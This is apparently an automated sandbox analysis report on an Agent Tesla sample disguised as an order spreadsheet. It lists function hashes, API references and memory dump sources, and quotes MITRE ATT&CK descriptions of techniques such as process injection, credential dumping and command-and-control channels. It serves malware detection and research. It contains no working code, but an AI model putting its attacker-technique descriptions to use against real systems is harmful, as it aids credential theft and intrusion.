Opcode ID: b907e1c45c40e11863b3ee3987b582a64156d517947521ae62de714bbf943b06
Instruction ID: f26dd66e81fd96c4784cd64d0ab2b8ada6906cb8449b6bd85c0779cadf900938
Opcode Fuzzy Hash: b907e1c45c40e11863b3ee3987b582a64156d517947521ae62de714bbf943b06
Instruction Fuzzy Hash: C352F6B4A05228CFCB659F24D8586ADB7BABF48305F1084EAD50AE7350CF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457BDD, Relevance: 3.6, APIs: 2, Instructions: 573COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 06d98d65f20e7ae06ca3999c4991d690e3d34b33779e143329affcc524e705e9
Instruction ID: 35ffcecd0c5f5bef1888b48d2a54fe69fd9cecd5aef97f7365a2cc112d7b046b
Opcode Fuzzy Hash: 06d98d65f20e7ae06ca3999c4991d690e3d34b33779e143329affcc524e705e9
Instruction Fuzzy Hash: FA4206B4A05228CFCB659F24C8586ADB7BABF48305F1085EAD50AE7350CF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457C22, Relevance: 3.6, APIs: 2, Instructions: 566COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1ee7cfd46b314f203c782d23db9f2a386b825561404e1bf7632cceba5ac7a311
Instruction ID: 908d8606d03baf160832d918382177517608587264fc4df43073dac6183320e1
Opcode Fuzzy Hash: 1ee7cfd46b314f203c782d23db9f2a386b825561404e1bf7632cceba5ac7a311
Instruction Fuzzy Hash: 744205B4A05228CFCB659F24C8586ADB7BABF48305F1084EAD50AE7350DF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457C67, Relevance: 3.6, APIs: 2, Instructions: 557COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4ca8a094e5575d05ea14e1410afac25bd7d96faa66aa17709101b9e55670c9e1
Instruction ID: 681fc3443e449a9d8577a4353d3c1d3b674291443e30d7bf8d066595d2054501
Opcode Fuzzy Hash: 4ca8a094e5575d05ea14e1410afac25bd7d96faa66aa17709101b9e55670c9e1
Instruction Fuzzy Hash: 8B4205B4A05228CFCB659F24C8586ADB7BABF48305F1084EAD50AE7350CF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457C99, Relevance: 3.6, APIs: 2, Instructions: 553COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c9ce6652a7e0f2b22dff528a387c082aae937cd59acafa56f0c9b69dd6043145
Instruction ID: 57ba5288eb641ba90e32d3f02b2a3967a8162e7a7f597ec6fff923ea3e2be74c
Opcode Fuzzy Hash: c9ce6652a7e0f2b22dff528a387c082aae937cd59acafa56f0c9b69dd6043145
Instruction Fuzzy Hash: EB4204B4A05228CFCB659F24C8586ADB7BABF48305F1084EAD50AE7350CF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457CDE, Relevance: 3.5, APIs: 2, Instructions: 546COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ff2fd7b4fe1525955e4ee334087061527fd89470b36d0e1177387ce6dea4c97f
Instruction ID: a2bfb110a1bcc3d9c49110d21d17fe6cc0678e86c9df9cf8c8c6ce4a0f8f75cf
Opcode Fuzzy Hash: ff2fd7b4fe1525955e4ee334087061527fd89470b36d0e1177387ce6dea4c97f
Instruction Fuzzy Hash: 2C4205B4A05228CFCB659F24C8586ADB7BABF48305F1085EAD50AE7350CF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457D23, Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b7b8398f707909e43bebaa28cf96adb3dddd5cc07d374638bafd1329a1fd9a61
Instruction ID: 7542357c0fe34174fd63da09a86ac9735afa654862159576eadbc765f63c4a93
Opcode Fuzzy Hash: b7b8398f707909e43bebaa28cf96adb3dddd5cc07d374638bafd1329a1fd9a61
Instruction Fuzzy Hash: 964205B4A05228CFCB659F24C8586ADB7BABF48305F1084EAD50AE7350DF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457D68, Relevance: 3.5, APIs: 2, Instructions: 532COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8125c6871c18453839f5901f5ac16322ef9e18f8c4f2b43a530a887244ee60bf
Instruction ID: f9a53051031b53a88b5d2f221a0e925ec0d43ffcdf21373a9144e7edbacfb194
Opcode Fuzzy Hash: 8125c6871c18453839f5901f5ac16322ef9e18f8c4f2b43a530a887244ee60bf
Instruction Fuzzy Hash: 584205B4A05228CFCB659F24C8586ADB7BABF48305F1084EAD50AE7350DF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457DAD, Relevance: 3.5, APIs: 2, Instructions: 525COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457DD1
KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e4b013c5d4254a758bbffdce2a4890037100d39b88c15eca2b9ca41b5c2e70ac
Instruction ID: 8aa26ef81c4eea2e111ec85e0407ce594e361533c2ae74b69161973dc26d1032
Opcode Fuzzy Hash: e4b013c5d4254a758bbffdce2a4890037100d39b88c15eca2b9ca41b5c2e70ac
Instruction Fuzzy Hash: 813205B4A05228CFCB659F24C8586ADB7BABF48305F1084EAD50AE7350DF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457DF2, Relevance: 2.0, APIs: 1, Instructions: 518COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8a6eb16e967da373d61dceab30268d86a4abdb076e6098bca8b3b34d12c2e833
Instruction ID: 205e95d06157173f111dcd984764b85ed3f9bc0d7d813d20f3ba7a6b1f9d591d
Opcode Fuzzy Hash: 8a6eb16e967da373d61dceab30268d86a4abdb076e6098bca8b3b34d12c2e833
Instruction Fuzzy Hash: 143205B4A05228CFCB659F24C85869DB7BABF48305F1084EAD50AE7350DF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457E37, Relevance: 2.0, APIs: 1, Instructions: 509COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a0d16c25980ba537d0878a3ba64d03d32fd5718388e69a87640a51f9211cb54a
Instruction ID: 21fc9a08fb63a26deee5e20e01883703add33b634116d00e69cd342ad4924aa1
Opcode Fuzzy Hash: a0d16c25980ba537d0878a3ba64d03d32fd5718388e69a87640a51f9211cb54a
Instruction Fuzzy Hash: A132F6B4A05228CFCB659F24C85869DB7BABF88305F1084EAD50AE7350DF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00457E73, Relevance: 2.0, APIs: 1, Instructions: 504COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00457E97

Memory Dump Source

Source File: 00000005.00000002.2380093601.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 92ad2d8c058d61c6e71ddeae6f2b167aa623d80b178dc5af20bbb3dbdadc9ebc
Instruction ID: 17fa65a9806a7fa87f5e3892161b5c94ca4ccac4974bda5812d38d5464e4edf7
Opcode Fuzzy Hash: 92ad2d8c058d61c6e71ddeae6f2b167aa623d80b178dc5af20bbb3dbdadc9ebc
Instruction Fuzzy Hash: 51320574A05228CFCB659F24C8586ADB7BABF88305F1084EAD50AE7350DF389E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0068E1B4, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0068E279

Memory Dump Source

Source File: 00000005.00000002.2380311151.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a4f0d30b1fee493a464a8ec0a84054cf6bba2ab083e7b6a0b9291f5d2ea29257
Instruction ID: 62adf79092f4e59f6a02f7dedc34851d42f864346537bbbe19ec4cdc04ab0dfe
Opcode Fuzzy Hash: a4f0d30b1fee493a464a8ec0a84054cf6bba2ab083e7b6a0b9291f5d2ea29257
Instruction Fuzzy Hash: AB41F0B1D002589FCB20CF99D894ADEFFB6BF48304F25852AE818AB310D7759905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0068DF58, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 0068E00C

Memory Dump Source

Source File: 00000005.00000002.2380311151.0000000000680000.00000040.00000001.sdmp, Offset: 00680000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8055efc04490bb2dfcf85168f774119856287a943223eabe6baed68da12dd07a
Instruction ID: 5ab1b5c0532a3a825e752e4cfa3b46426103a6900eb908c525cd60825b495b57
Opcode Fuzzy Hash: 8055efc04490bb2dfcf85168f774119856287a943223eabe6baed68da12dd07a
Instruction Fuzzy Hash: 7831D1B5D002499FDB14CF99C588A8EFFF6BF48304F248A6AE409AB341C7B59945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC0683, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2380431592.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be106e33d2cc58fa996bbe2653477bf575c4e6a990c4d416a951bf144384b63
Instruction ID: f3c9df761a36384684778dc98e3d5801e054c2988eb4ad6be3292120ce8f4001
Opcode Fuzzy Hash: 2be106e33d2cc58fa996bbe2653477bf575c4e6a990c4d416a951bf144384b63
Instruction Fuzzy Hash: 71419238B501049FC744DF69C998E6ABBF6EF88715B2680A9E906DB371DB31EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002ED48C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2379975147.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cb31dff22f833043db8899880a6e48634109258f26ab23dfe3e454ea6fc91ca
Instruction ID: 50c35c6f0d94a27533242488e5f2dca8ddeeb95b34e9246d5096f885ba408732
Opcode Fuzzy Hash: 6cb31dff22f833043db8899880a6e48634109258f26ab23dfe3e454ea6fc91ca
Instruction Fuzzy Hash: 37212575590284DFCB01DF10D8C0B2ABF66FB98328FB085A9E8050B246C336D826CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002ED578, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2379975147.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb34d9fc859ae30423496a6bf0281a09bf19a8ba0d818e7a5fe10bf281430b00
Instruction ID: d752ad95c3ba877471a6e359721318d5477b088afd4254e81a534a62f0605ab2
Opcode Fuzzy Hash: bb34d9fc859ae30423496a6bf0281a09bf19a8ba0d818e7a5fe10bf281430b00
Instruction Fuzzy Hash: DC213775550284DFCF11CF50E9C0B2ABF69FB98318F7489A9E8090B246C336D866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0030D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2380000120.000000000030D000.00000040.00000001.sdmp, Offset: 0030D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a485b53d0f6c50e0dfdd0d2fb67107aba149cbb9597423899bb45a8c3e45ccb
Instruction ID: 1369fc794ebcf75504678a87da53d334efcf575da6ec4d4d12c4156363c9740c
Opcode Fuzzy Hash: 8a485b53d0f6c50e0dfdd0d2fb67107aba149cbb9597423899bb45a8c3e45ccb
Instruction Fuzzy Hash: E221F275604244DFDB16DFA4D894B16BBA9FB84314F30C9A9D80E4B786C33AD807CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002ED487, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2379975147.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b8ea50d64d6d3a05b1b78d8501f3f793ffd34cfd8cca77af0015f5a1d19332
Instruction ID: 6f028878a9f9615d96d313e3694928e8d1dedf585903a86c50ac31420ed674f3
Opcode Fuzzy Hash: 09b8ea50d64d6d3a05b1b78d8501f3f793ffd34cfd8cca77af0015f5a1d19332
Instruction Fuzzy Hash: 91110876444280CFCF02CF14D9C4B1ABF72FB94314F24C6A9D8090B216C336D966CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 002ED573, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2379975147.00000000002ED000.00000040.00000001.sdmp, Offset: 002ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b8ea50d64d6d3a05b1b78d8501f3f793ffd34cfd8cca77af0015f5a1d19332
Instruction ID: d4cbfd95d88af27b8c283454cc2a4b5cd81d59c45c491b06bf8547a20c300c4e
Opcode Fuzzy Hash: 09b8ea50d64d6d3a05b1b78d8501f3f793ffd34cfd8cca77af0015f5a1d19332
Instruction Fuzzy Hash: 3311E676444280CFCF12CF14E5C4B1ABF71FB94314F24C5A9D8094B216C336D866CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0030D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2380000120.000000000030D000.00000040.00000001.sdmp, Offset: 0030D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f25f2b4513098e7777517fd4da77a92fef37a780737990c108bf61b3c62d7b
Instruction ID: 8c5d04b80ca6c52445bb350e8508bf91bb707423217ab203c07db6f468519159
Opcode Fuzzy Hash: 13f25f2b4513098e7777517fd4da77a92fef37a780737990c108bf61b3c62d7b
Instruction Fuzzy Hash: AB119D75504280DFCB12CF54D9D4B15FFA1FB84314F24C6AAD8094B696C33AD84BCBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report New Order for April#89032.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "New Order for April#89032.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre